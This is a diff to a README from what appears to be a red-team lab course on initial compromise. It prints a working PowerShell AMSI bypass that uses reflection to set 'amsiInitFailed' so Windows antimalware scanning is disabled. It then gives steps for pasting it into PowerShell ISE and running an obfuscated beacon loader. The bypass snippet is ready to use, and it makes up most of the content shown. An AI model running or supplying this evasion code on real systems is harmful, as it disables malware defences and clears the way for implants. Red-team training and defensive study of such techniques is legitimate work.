r3dlab-team/RTLAB-Denmark2025/2_Initial Compromise and Weaponization/README.md

 ```
 3. Do the same for our generated `beacon_loader_obfuscated.ps1` Powershell loader:

-4. Inject AMSI Bypass (line by line):
+4. Inject AMSI Bypass:
 ```powershell
 $a=([ref].Assembly.GetTypes() | ? { $_.Name -like '*Amsi*' }).DeclaredFields | ?  { $_.Name -eq 'amsiInitFailed' }
 $a.SetValue([void]0, $true)
 ```
-Paste each line of your AMSI bypass code individually into the PowerShell_ISE command pane and execute per line.
+Paste the AMSI bypass code into the PowerShell_ISE command pane and press ENTER to execute it.

 5. Copy, paste and execute the loader:
 ![image](https://github.com/user-attachments/assets/bbb273e7-155a-4e37-b97e-1d7abb5e5fe2)